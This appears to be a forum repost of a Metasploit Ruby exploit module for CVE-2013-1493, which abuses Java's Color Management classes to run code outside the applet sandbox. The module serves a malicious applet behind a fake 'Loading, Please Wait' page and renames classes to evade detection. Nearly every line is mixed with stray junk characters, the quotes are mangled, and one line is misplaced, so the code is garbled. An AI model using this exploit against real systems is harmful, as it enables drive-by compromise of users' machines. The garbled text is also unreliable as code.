##9 s) p+ ~0 x# } S
# x* e. N, o* {0 E; s( y% f( C( ]
# This file is part of the Metasploit Framework and may be subject to
& A( P# G0 Z" O: L' z; {# redistribution and commercial restrictions. Please see the Metasploit
- a4 }& Y4 Y- b% q$ h# web site for more information on licensing and terms of use.
2 P( v. A3 Z- j; ^- T# http://metasploit.com/8 h# K, s! O8 `: ?
##" }+ m, R+ T" \0 |
require ‘msf/core’4 v* h% M& |& O- z8 z/ ]
require ‘rex’
" S" P6 f3 L }, g# r8 jclass Metasploit3 < Msf::Exploit::Remote# f9 L& Y1 c+ I' N* Q; j
Rank = NormalRanking
. h. w& f7 \, _6 E& [3 {( F8 Cinclude Msf::Exploit::Remote::HttpServer::HTML
9 M4 Q0 e2 U4 y% C; T7 R$ a% e5 H5 Y5 hinclude Msf::Exploit::EXE) e2 s; O. g6 K$ W$ p* i# ~+ W
include Msf::Exploit::Remote::BrowserAutopwn" S0 E: M/ [2 P# C6 t% ~# G
autopwn_info({ :javascript => false })# |1 V, X$ j) }0 \
def initialize( info = {} )* p# X* N% E% I' ?# l! e$ l+ [
super( update_info( info,
" V% f: V, F6 h! |0 O9 ^. b4 j$ ?‘Name’ => ‘Java CMM Remote Code Execution’,
$ A' Y- u2 [$ e8 U0 o, ^" W u* P‘Description’ => %q{ z6 V: v6 p4 h% b4 j; X
This module abuses the Color Management classes from a Java Applet to run
& Y* f; o1 \: Warbitrary Java code outside of the sandbox as exploited in the wild in February% O* b) y! l. T L/ R) H' y# G
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
' ?5 X2 G' Z) B3 band earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1# c; P F. b3 {& B2 f& n3 l0 g
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
9 l1 K4 C+ }3 I8 u7 N9 `# qwarning in order to run the malicious applet.' s6 \( H& O, Z) e* _9 _
},
3 s6 y) @ \) D9 f# U* u7 M‘License’ => MSF_LICENSE,
~4 R: P0 T) C. a‘Author’ =>8 x& F8 z7 T9 w: n
'Unknown', # Vulnerability discovery and Exploit# j, D% W6 y5 \& K
'juan vazquez' # Metasploit module (just ported the published exploit)
! v) n) ?, `5 x2 e],* }4 T+ Q v$ @ @
‘References’ =>) B z) c* P3 G. I
[
; ^2 a, a' [) }# B[ 'CVE', '2013-1493' ],
5 ]( f' r: b% |. i9 }8 F[ 'OSVDB', '90737' ],1 C% N3 I, m3 |
[ 'BID', '58238' ],
) l. U' N1 E' J" e; B# c0 J1 l[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
3 h w; ~- w4 q[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
: c* m8 p Y& V' t# v6 t' A[ 'URL', 'http://pastie.org/pastes/6581034' ]
. d+ t: s; ~3 L0 t$ m; |8 N' Q],0 J C# }2 m& w* F
‘Platform’ => [ 'win', 'java' ],* Y4 w0 G3 b: k0 ]) Y
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },: }. L8 h! H# ]' F0 T( K
‘Targets’ =>
9 `( A3 J$ g, j[
9 g. ?5 H6 e' ~: q[ 'Generic (Java Payload)',
( c9 V* s- C+ X/ v; m{' |) i) z% u4 I( J# i
'Platform' => 'java',
# o; f/ C4 B2 E'Arch' => ARCH_JAVA2 }. H4 r2 }1 m) X! G/ i
}# h/ v# T9 W8 l, ~$ K
],
2 s6 b% J6 p3 ~- E0 L, X$ z[ 'Windows x86 (Native Payload)',
3 y$ f3 O+ {7 ~{5 I- n7 L5 |9 X. @0 S" S2 V5 r2 h
'Platform' => 'win',
. p# p: v& @. p- ~+ X6 B1 t- W$ \2 i7 f'Arch' => ARCH_X86
/ P' w6 `! z$ v4 {; `}
7 @" b. B) @3 T& G! h- G]& G/ S$ Y+ j4 {9 |- d# L) U. X
]," Q! C- T9 T( m* C( X. ^
‘‘DisclosureDate’ => ‘Mar 01 2013′
* X7 @; M2 Z* |/ q; D))
) F- |: m% T2 R$ Send
8 b. o6 c O# h' G, @/ Vdef setup
) N& J5 U6 @7 y8 E, opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
$ [ e! [3 ^) Y/ k" V [3 D@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }2 Q X t9 F* O9 C; K; `9 d0 s5 O
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)# P0 Y9 a5 d3 g, c7 b
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ k3 c8 Q7 c4 R% p! G* _1 i1 e4 bpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)6 Y; O9 _$ {! F. D
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }: j h# y$ `0 H' F
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)+ W( v0 U) q: ^( @ j+ e7 c
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }( V" N( F; a0 j8 D- z5 P/ X
@init_class_name = rand_text_alpha(“Init”.length)" @! ^6 h) l; B
@init_class.gsub!(“Init”, @init_class_name)4 I% A7 R( _0 P8 O6 s" t( V
super) a4 W6 T* x& O$ w9 F W
end
) @1 R- b4 `/ b; m# Qdef on_request_uri(cli, request)/ a F" g9 z, v# k+ l; g1 E
print_status(“handling request for #{request.uri}”)6 w `" g1 w" j" S: j
case request.uri
0 W2 S, \9 U8 S! gwhen /\.jar$/i4 ?+ b7 [& q" w! M9 t/ n
jar = payload.encoded_jar
! R% w1 ^( j( L, x* Zjar.add_file(“#{@init_class_name}.class”, @init_class)
0 E3 S: k, U! N7 J+ Ejar.add_file(“Leak.class”, @leak_class)
* q: H* r0 q6 ?- V7 c8 H$ |" Ijar.add_file(“MyBufferedImage.class”, @buffered_image_class) l9 R' k' i( f
jar.add_file(“MyColorSpace.class”, @color_space_class)9 j; s& Z2 k" n5 Q7 e1 T
DefaultTarget’ => 1,
O' H: l3 Q$ K# v# k9 ]+ Lmetasploit_str = rand_text_alpha(“metasploit”.length)
, i0 m" `# |. Gpayload_str = rand_text_alpha(“payload”.length)8 f3 R# O3 U. p1 k* ^
jar.entries.each { |entry|
6 H8 k, n, @0 \" u2 Z: ~entry.name.gsub!(“metasploit”, metasploit_str)/ S& w) L: @( q4 W* G5 b6 d
entry.name.gsub!(“Payload”, payload_str)2 s h+ B( R& W$ c
entry.data = entry.data.gsub(“metasploit”, metasploit_str)1 V2 f* V* E7 I4 O. ?6 h
entry.data = entry.data.gsub(“Payload”, payload_str)
3 ^: y( c: f: E. `- a) r}5 h) @! `7 d T) p1 Q
jar.build_manifest
7 A7 F% [- m L- {. e, Bsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
. q1 [* \, H. B i( ~) Hwhen /\/$/
8 a; N2 F) f" \0 g: n) u+ f9 Qpayload = regenerate_payload(cli); c* C! x; i3 W) S2 z4 z
if not payload
+ y2 T5 H0 v6 t+ {$ E5 w, L/ zprint_error(“Failed to generate the payload.”)
# j' Z. V" l# `5 W. usend_not_found(cli)3 H& w5 ?% \& w0 D6 O
return2 @' z. Q, `$ }8 X, U- w1 p6 _
end5 a7 p: i& N$ C* C- ^$ I' s( E
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })4 z# E0 N: ]. Z9 d2 Y$ P$ T/ `( S
else0 w x6 i2 a7 q2 `* J5 t
send_redirect(cli, get_resource() + ‘/’, ”)- b! o& d* p; ~ K
end
" f& \ e5 s! W+ g3 o3 k$ Lend: V0 ~; P# ?9 y; R/ H( X- p6 [
def generate_html
! D: e3 ^4 r" ^7 _% W7 Shtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
4 u; b6 R9 j/ k5 e! H9 f, ]8 W6 Jhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|" }! ?% o( [8 T8 I/ M3 E3 ^
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|1 z e P# d1 [7 b: i9 K2 y! O
html += %Q|</applet></body></html>|
, S0 w5 s- m. B. mreturn html
) Q' O& {+ z U+ N* N. e* E# H5 h! nend
6 z f7 P$ [" ^- Xend
; L! U" g- _. o4 w9 m' y5 wend
; e8 }/ v, z( y; @# _ |
发表于 2013-4-4 17:31:17
收藏
支持
反对